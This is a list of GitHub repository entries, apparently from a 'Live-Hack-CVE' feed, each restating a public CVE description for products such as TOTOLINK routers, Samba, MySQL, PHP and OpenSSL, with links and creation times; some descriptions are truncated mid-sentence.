**TOTOLink A7000R V9.1.0u.6115_B20201022 was discovered to contain a stack overflow via the ip parameter in the function setDiagnosisCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37075](https://github.com/Live-Hack-CVE/CVE-2022-37075) create time: 2022-12-30T03:17:53Z

**TOTOLINK N350RT V9.3.5u.6139_B20201216 was discovered to contain a command injection vulnerability via the command parameter in the function setTracerouteCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36487](https://github.com/Live-Hack-CVE/CVE-2022-36487) create time: 2022-12-30T03:17:49Z

**TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a stack overflow via the lang parameter in the function setLanguageCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36462](https://github.com/Live-Hack-CVE/CVE-2022-36462) create time: 2022-12-30T03:17:44Z

**TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a command injection vulnerability via the hostName parameter in the function setOpModeCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36461](https://github.com/Live-Hack-CVE/CVE-2022-36461) create time: 2022-12-30T03:17:41Z

**TOTOLINK A3700R V9.1.2u.6134_B20201202 was discovered to contain a command injection vulnerability via the FileName parameter in the function UploadFirmwareFile. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36460](https://github.com/Live-Hack-CVE/CVE-2022-36460) create time: 2022-12-30T03:17:37Z

**Buffer overflow in Samba 2.2.x to 2.2.9, and 3.0.0 to 3.0.4, when the "mangling method = hash" option is enabled in smb.conf, has unknown impact and attack vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2004-0686](https://github.com/Live-Hack-CVE/CVE-2004-0686) create time: 2022-12-30T01:53:39Z

**PHP 5 before 5.2.3 does not enforce the open_basedir or safe_mode restriction in certain cases, which allows context-dependent attackers to determine the existence of arbitrary files by checking if the readfile function returns a string. NOTE: this issue might also involve the realpath function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2007-3007](https://github.com/Live-Hack-CVE/CVE-2007-3007) create time: 2022-12-30T01:52:47Z

**Logic error in the SID/Name translation functionality in smbd in Samba 3.0.23d through 3.0.25pre2 allows local users to gain temporary privileges and execute SMB/CIFS protocol operations via unspecified vectors that cause the daemon to transition to the root user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2007-2444](https://github.com/Live-Hack-CVE/CVE-2007-2444) create time: 2022-12-30T01:51:56Z

**Unspecified vulnerability in Octopussy before 0.9.5.8 has unknown impact and attack vectors related to a "major security" vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-6566](https://github.com/Live-Hack-CVE/CVE-2008-6566) create time: 2022-12-30T01:54:03Z

**Heap-based buffer overflow in the receive_smb_raw function in util/sock.c in Samba 3.0.0 through 3.0.29 allows remote attackers to execute arbitrary code via a crafted SMB response. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-1105](https://github.com/Live-Hack-CVE/CVE-2008-1105) create time: 2022-12-30T01:52:06Z

**The acl_group_override function in smbd/posix_acls.c in smbd in Samba 3.0.x before 3.0.35, 3.1.x and 3.2.x before 3.2.13, and 3.3.x before 3.3.6, when dos filemode is enabled, allows remote attackers to modify access control lists for files via vectors related to read access to uninitialized memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-1888](https://github.com/Live-Hack-CVE/CVE-2009-1888) create time: 2022-12-30T01:54:37Z

**Buffer overflow in the SMB1 packet chaining implementation in the chain_reply function in process.c in smbd in Samba 3.0.x before 3.3.13 allows remote attackers to cause a denial of service (memory corruption and daemon crash) or possibly execute arbitrary code via a crafted field in a packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-2063](https://github.com/Live-Hack-CVE/CVE-2010-2063) create time: 2022-12-30T01:52:36Z

**Stack-based buffer overflow in the (1) sid_parse and (2) dom_sid_parse functions in Samba before 3.5.5 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted Windows Security ID (SID) on a file share. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-3069](https://github.com/Live-Hack-CVE/CVE-2010-3069) create time: 2022-12-30T01:52:03Z

**ActiveCollab before 2.3.2 allows remote authenticated users to bypass intended access restrictions, and (1) delete an attachment or (2) subscribe to an object, via a crafted URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-0215](https://github.com/Live-Hack-CVE/CVE-2010-0215) create time: 2022-12-30T01:51:59Z

**Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-5298](https://github.com/Live-Hack-CVE/CVE-2010-5298) create time: 2022-12-30T01:47:05Z

**Integer overflow in the exif_process_IFD_TAG function in exif.c in the exif extension in PHP 5.4.0beta2 on 32-bit platforms allows remote attackers to read the contents of arbitrary memory locations or cause a denial of service via a crafted offset_val value in an EXIF header in a JPEG file, a different vulnerability t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-4566](https://github.com/Live-Hack-CVE/CVE-2011-4566) create time: 2022-12-30T01:52:29Z

**Multiple cross-site request forgery (CSRF) vulnerabilities in the Samba Web Administration Tool (SWAT) in Samba 3.x before 3.5.10 allow remote attackers to hijack the authentication of administrators for requests that (1) shut down daemons, (2) start daemons, (3) add shares, (4) remove shares, (5) add printers, (6) rem CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-2522](https://github.com/Live-Hack-CVE/CVE-2011-2522) create time: 2022-12-30T01:51:52Z

**Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-0578](https://github.com/Live-Hack-CVE/CVE-2012-0578) create time: 2022-12-30T02:37:52Z

**Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-1705](https://github.com/Live-Hack-CVE/CVE-2012-1705) create time: 2022-12-30T02:37:47Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability, related to Server DML. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-1688](https://github.com/Live-Hack-CVE/CVE-2012-1688) create time: 2022-12-30T02:37:44Z

**Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-0572](https://github.com/Live-Hack-CVE/CVE-2012-0572) create time: 2022-12-30T02:37:40Z

**Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier and 5.5.23 and earlier allows remote authenticated users to affect availability, related to GIS Extension. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-0540](https://github.com/Live-Hack-CVE/CVE-2012-0540) create time: 2022-12-30T02:37:36Z

**Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-0574](https://github.com/Live-Hack-CVE/CVE-2012-0574) create time: 2022-12-30T02:37:17Z

**Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.22 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-1689](https://github.com/Live-Hack-CVE/CVE-2012-1689) create time: 2022-12-30T02:37:13Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.21 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-1697](https://github.com/Live-Hack-CVE/CVE-2012-1697) create time: 2022-12-30T02:37:10Z

**The PowerVR GPU driver allows unprivileged apps to allocated pinned memory, unpin it (which makes it available to be freed), and continue using the page in GPU calls. No privileges required and this results in kernel memory corruption.Product: AndroidVersions: Android SoCAndroid ID: A-232441339 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20122](https://github.com/Live-Hack-CVE/CVE-2022-20122) create time: 2022-12-30T02:30:20Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-1756](https://github.com/Live-Hack-CVE/CVE-2012-1756) create time: 2022-12-30T01:47:29Z

**Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.23 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-1734](https://github.com/Live-Hack-CVE/CVE-2012-1734) create time: 2022-12-30T01:47:25Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-1757](https://github.com/Live-Hack-CVE/CVE-2012-1757) create time: 2022-12-30T01:47:22Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-3166](https://github.com/Live-Hack-CVE/CVE-2012-3166) create time: 2022-12-30T01:46:54Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB Plugin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-3173](https://github.com/Live-Hack-CVE/CVE-2012-3173) create time: 2022-12-30T01:46:51Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-3180](https://github.com/Live-Hack-CVE/CVE-2012-3180) create time: 2022-12-30T01:46:37Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-3150](https://github.com/Live-Hack-CVE/CVE-2012-3150) create time: 2022-12-30T01:46:34Z

**Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (mysqld crash) via a SELECT command with an UpdateXML command containing XML with a large number of unique, nested elements. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5614](https://github.com/Live-Hack-CVE/CVE-2012-5614) create time: 2022-12-30T01:46:20Z

**Oracle MySQL and MariaDB 5.5.x before 5.5.29, 5.3.x before 5.3.12, and 5.2.x before 5.2.14 does not modify the salt during multiple executions of the change_user command within the same connection which makes it easier for remote authenticated users to conduct brute force password guessing attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5627](https://github.com/Live-Hack-CVE/CVE-2012-5627) create time: 2022-12-30T01:46:17Z

**Samba 3.x before 3.6.23, 4.0.x before 4.0.16, and 4.1.x before 4.1.6 does not enforce the password-guessing protection mechanism for all interfaces, which makes it easier for remote attackers to obtain access via brute-force ChangePasswordUser2 (1) SAMR or (2) RAP attempts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-4496](https://github.com/Live-Hack-CVE/CVE-2013-4496) create time: 2022-12-30T01:53:32Z

**Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote attackers to affect availability via unknown vectors related to Server Locking. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0383](https://github.com/Live-Hack-CVE/CVE-2013-0383) create time: 2022-12-30T01:49:00Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Parser. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-3783](https://github.com/Live-Hack-CVE/CVE-2013-3783) create time: 2022-12-30T01:47:18Z

**Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-2389](https://github.com/Live-Hack-CVE/CVE-2013-2389) create time: 2022-12-30T01:47:15Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-3793](https://github.com/Live-Hack-CVE/CVE-2013-3793) create time: 2022-12-30T01:47:12Z

**Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-2392](https://github.com/Live-Hack-CVE/CVE-2013-2392) create time: 2022-12-30T01:47:08Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Partition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-3794](https://github.com/Live-Hack-CVE/CVE-2013-3794) create time: 2022-12-30T01:47:01Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Full Text Search. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-3802](https://github.com/Live-Hack-CVE/CVE-2013-3802) create time: 2022-12-30T01:46:58Z

**The internal DNS server in Samba 4.x before 4.0.18 does not check the QR field in the header section of an incoming DNS message before sending a response, which allows remote attackers to cause a denial of service (CPU and bandwidth consumption) via a forged response packet that triggers a communication loop, a related CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0239](https://github.com/Live-Hack-CVE/CVE-2014-0239) create time: 2022-12-30T01:53:36Z

**Heap-based buffer overflow in the php_parserr function in ext/standard/dns.c in PHP 5.6.0beta4 and earlier allows remote servers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted DNS TXT record, related to the dns_get_record function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-4049](https://github.com/Live-Hack-CVE/CVE-2014-4049) create time: 2022-12-30T01:53:08Z

**The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0221](https://github.com/Live-Hack-CVE/CVE-2014-0221) create time: 2022-12-30T01:48:57Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.38 and earlier, and 5.6.19 and earlier, allows remote attackers to affect availability via vectors related to SERVER:SSL:yaSSL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6495](https://github.com/Live-Hack-CVE/CVE-2014-6495) create time: 2022-12-30T01:48:54Z

**The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a buffer pointer during certain recursive calls, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via vectors that trigger a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0198](https://github.com/Live-Hack-CVE/CVE-2014-0198) create time: 2022-12-30T01:48:50Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier, and 5.6.20 and earlier, allows remote authenticated users to affect confidentiality, integrity, and availability via vectors related to SERVER:DML. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6507](https://github.com/Live-Hack-CVE/CVE-2014-6507) create time: 2022-12-30T01:48:47Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier, and 5.6.20 and earlier, allows remote attackers to affect availability via vectors related to CLIENT:SSL:yaSSL, a different vulnerability than CVE-2014-6496. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6494](https://github.com/Live-Hack-CVE/CVE-2014-6494) create time: 2022-12-30T01:48:44Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier, and 5.6.20 and earlier, allows remote attackers to affect availability via vectors related to CLIENT:SSL:yaSSL, a different vulnerability than CVE-2014-6494. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6496](https://github.com/Live-Hack-CVE/CVE-2014-6496) create time: 2022-12-30T01:48:40Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.38 and earlier, and 5.6.19 and earlier, allows remote attackers to affect integrity via vectors related to SERVER:SSL:yaSSL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6478](https://github.com/Live-Hack-CVE/CVE-2014-6478) create time: 2022-12-30T01:48:37Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.39 and earlier, and 5.6.20 and earlier, allows remote attackers to affect confidentiality via vectors related to C API SSL CERTIFICATE HANDLING. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6559](https://github.com/Live-Hack-CVE/CVE-2014-6559) create time: 2022-12-30T01:48:33Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.38 and earlier and 5.6.19 and earlier allows local users to affect confidentiality, integrity, and availability via vectors related to SERVER:MyISAM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-4274](https://github.com/Live-Hack-CVE/CVE-2014-4274) create time: 2022-12-30T01:48:23Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via vectors related to XML. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0384](https://github.com/Live-Hack-CVE/CVE-2014-0384) create time: 2022-12-30T01:46:47Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.71 and earlier, 5.5.33 and earlier, and 5.6.13 and earlier allows remote authenticated users to affect availability via unknown vectors related to Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0386](https://github.com/Live-Hack-CVE/CVE-2014-0386) create time: 2022-12-30T01:46:44Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.35 and earlier and 5.6.15 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-2419](https://github.com/Live-Hack-CVE/CVE-2014-2419) create time: 2022-12-30T01:46:41Z

**The SMB1 implementation in smbd in Samba 3.x and 4.x before 4.1.23, 4.2.x before 4.2.9, 4.3.x before 4.3.6, and 4.4.x before 4.4.0rc4 allows remote authenticated users to modify arbitrary ACLs by using a UNIX SMB1 call to create a symlink, and then using a non-UNIX SMB1 call to write to the ACL content. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7560](https://github.com/Live-Hack-CVE/CVE-2015-7560) create time: 2022-12-30T01:53:53Z

**The shadow_copy2_get_shadow_copy_data function in modules/vfs_shadow_copy2.c in Samba 3.x and 4.x before 4.1.22, 4.2.x before 4.2.7, and 4.3.x before 4.3.3 does not verify that the DIRECTORY_LIST access right has been granted, which allows remote attackers to access snapshots by visiting a shadow copy directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5299](https://github.com/Live-Hack-CVE/CVE-2015-5299) create time: 2022-12-30T01:53:29Z

**Oracle MySQL before 5.7.3, Oracle MySQL Connector/C (aka libmysqlclient) before 6.1.3, and MariaDB before 5.5.44 use the --ssl option to mean that SSL is optional, which allows man-in-the-middle attackers to spoof servers via a cleartext-downgrade attack, aka a "BACKRONYM" attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-3152](https://github.com/Live-Hack-CVE/CVE-2015-3152) create time: 2022-12-30T01:53:14Z

**Samba 3.x and 4.x before 4.1.22, 4.2.x before 4.2.7, and 4.3.x before 4.3.3 supports connections that are encrypted but unsigned, which allows man-in-the-middle attackers to conduct encrypted-to-unencrypted downgrade attacks by modifying the client-server data stream, related to clidfs.c, libsmb_server.c, and smbXcli_b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5296](https://github.com/Live-Hack-CVE/CVE-2015-5296) create time: 2022-12-30T01:53:00Z

**The samldb_check_user_account_control_acl function in dsdb/samdb/ldb_modules/samldb.c in Samba 4.x before 4.1.22, 4.2.x before 4.2.7, and 4.3.x before 4.3.3 does not properly check for administrative privileges during creation of machine accounts, which allows remote authenticated users to bypass intended access restri CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-8467](https://github.com/Live-Hack-CVE/CVE-2015-8467) create time: 2022-12-30T01:51:38Z

**vfs.c in smbd in Samba 3.x and 4.x before 4.1.22, 4.2.x before 4.2.7, and 4.3.x before 4.3.3, when share names with certain substring relationships exist, allows remote attackers to bypass intended file-access restrictions via a symlink that points outside of a share. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5252](https://github.com/Live-Hack-CVE/CVE-2015-5252) create time: 2022-12-30T01:50:54Z

**The odbc_bindcols function in ext/odbc/php_odbc.c in PHP before 5.6.12 mishandles driver behavior for SQL_WVARCHAR columns, which allows remote attackers to cause a denial of service (application crash) in opportunistic circumstances by leveraging use of the odbc_fetch_array function to access a certain type of Microso CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-8879](https://github.com/Live-Hack-CVE/CVE-2015-8879) create time: 2022-12-30T01:49:55Z

**The LDAP server in the AD domain controller in Samba 4.x before 4.1.22 does not check return values to ensure successful ASN.1 memory allocation, which allows remote attackers to cause a denial of service (memory consumption and daemon crash) via crafted packets. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7540](https://github.com/Live-Hack-CVE/CVE-2015-7540) create time: 2022-12-30T01:49:48Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.43 and earlier and 5.6.23 and earlier allows remote authenticated users to affect confidentiality via unknown vectors related to Server : Security : Privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-2620](https://github.com/Live-Hack-CVE/CVE-2015-2620) create time: 2022-12-30T01:48:26Z

**wolfSSL (formerly CyaSSL) before 3.6.8 does not properly handle faults associated with the Chinese Remainder Theorem (CRT) process when allowing ephemeral key exchange without low memory optimizations on a server, which makes it easier for remote attackers to obtain private RSA keys by capturing TLS handshakes, aka a L CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-7744](https://github.com/Live-Hack-CVE/CVE-2015-7744) create time: 2022-12-30T01:48:14Z

**Samba version 4.0.0 up to 4.5.2 is vulnerable to privilege elevation due to incorrect handling of the PAC (Privilege Attribute Certificate) checksum. A remote, authenticated, attacker can cause the winbindd process to crash using a legitimate Kerberos ticket. A local service with access to the winbindd privileged pipe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2126](https://github.com/Live-Hack-CVE/CVE-2016-2126) create time: 2022-12-30T01:54:00Z

**Integer overflow in the _gdContributionsAlloc function in gd_interpolation.c in GD Graphics Library (aka libgd) before 2.2.3 allows remote attackers to cause a denial of service (out-of-bounds memory write or memory consumption) via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6207](https://github.com/Live-Hack-CVE/CVE-2016-6207) create time: 2022-12-30T01:53:21Z

**It was found that Samba before versions 4.5.3, 4.4.8, 4.3.13 always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2125](https://github.com/Live-Hack-CVE/CVE-2016-2125) create time: 2022-12-30T01:53:11Z

**PHP through 7.0.8 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-5385](https://github.com/Live-Hack-CVE/CVE-2016-5385) create time: 2022-12-30T01:52:40Z

**A flaw was found in samba versions 4.0.0 to 4.5.2. The Samba routine ndr_pull_dnsp_name contains an integer wrap problem, leading to an attacker-controlled memory overwrite. ndr_pull_dnsp_name parses data from the Samba Active Directory ldb database. Any user who can write to the dnsRecord attribute over LDAP can trigg CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2123](https://github.com/Live-Hack-CVE/CVE-2016-2123) create time: 2022-12-30T01:52:13Z

**libcli/smb/smbXcli_base.c in Samba 4.x before 4.2.14, 4.3.x before 4.3.11, and 4.4.x before 4.4.5 allows man-in-the-middle attackers to bypass a client-signing protection mechanism, and consequently spoof SMB2 and SMB3 servers, via the (1) SMB2_SESSION_FLAG_IS_GUEST or (2) SMB2_SESSION_FLAG_IS_NULL flag. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2119](https://github.com/Live-Hack-CVE/CVE-2016-2119) create time: 2022-12-30T01:51:49Z

**The MS-SAMR and MS-LSAD protocol implementations in Samba 3.x and 4.x before 4.2.11, 4.3.x before 4.3.8, and 4.4.x before 4.4.2 mishandle DCERPC connections, which allows man-in-the-middle attackers to perform protocol-downgrade attacks and impersonate users by modifying the client-server data stream, aka "BADLOCK." CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2118](https://github.com/Live-Hack-CVE/CVE-2016-2118) create time: 2022-12-30T01:51:45Z

**Integer overflow in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory consumption or application crash) via a truncated manifest entry in a PHAR archive. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-10159](https://github.com/Live-Hack-CVE/CVE-2016-10159) create time: 2022-12-30T01:50:20Z

**The parser in Google V8, as used in Google Chrome before 53.0.2785.113, mishandles scopes, which allows remote attackers to obtain sensitive information from arbitrary memory locations via crafted JavaScript code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-5172](https://github.com/Live-Hack-CVE/CVE-2016-5172) create time: 2022-12-30T01:49:59Z

**Unspecified vulnerability in Oracle MySQL 5.7.13 and earlier allows remote administrators to affect availability via vectors related to Server: DML. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-5628](https://github.com/Live-Hack-CVE/CVE-2016-5628) create time: 2022-12-30T01:49:45Z

**Unspecified vulnerability in Oracle MySQL 5.7.13 and earlier allows remote administrators to affect availability via vectors related to RBR. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-5634](https://github.com/Live-Hack-CVE/CVE-2016-5634) create time: 2022-12-30T01:49:42Z

**Unspecified vulnerability in Oracle MySQL 5.7.13 and earlier allows remote administrators to affect availability via vectors related to Server: Memcached. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-5631](https://github.com/Live-Hack-CVE/CVE-2016-5631) create time: 2022-12-30T01:49:38Z

**Unspecified vulnerability in Oracle MySQL 5.7.13 and earlier allows remote administrators to affect availability via vectors related to Server: Performance Schema, a different vulnerability than CVE-2016-8290. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-5633](https://github.com/Live-Hack-CVE/CVE-2016-5633) create time: 2022-12-30T01:49:35Z

**Unspecified vulnerability in Oracle MySQL 5.7.14 and earlier allows remote administrators to affect availability via vectors related to Server: Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-5632](https://github.com/Live-Hack-CVE/CVE-2016-5632) create time: 2022-12-30T01:49:25Z

**Unspecified vulnerability in Oracle MySQL 5.7.13 and earlier allows remote administrators to affect availability via vectors related to Server: Security: Audit. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-5635](https://github.com/Live-Hack-CVE/CVE-2016-5635) create time: 2022-12-30T01:49:07Z

**PHP 7.1.5 has an Out of bounds access in php_pcre_replace_impl via a crafted preg_replace call. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-9118](https://github.com/Live-Hack-CVE/CVE-2017-9118) create time: 2022-12-30T01:54:28Z

**Samba before versions 4.6.1, 4.5.7 and 4.4.11 are vulnerable to a malicious client using a symlink race to allow access to areas of the server file system not exported under the share definition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2619](https://github.com/Live-Hack-CVE/CVE-2017-2619) create time: 2022-12-30T01:51:42Z

**It was found that samba before 4.4.16, 4.5.x before 4.5.14, and 4.6.x before 4.6.8 did not enforce "SMB signing" when certain configuration options were enabled. A remote attacker could launch a man-in-the-middle attack and retrieve information in plain-text. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-12150](https://github.com/Live-Hack-CVE/CVE-2017-12150) create time: 2022-12-30T01:50:17Z

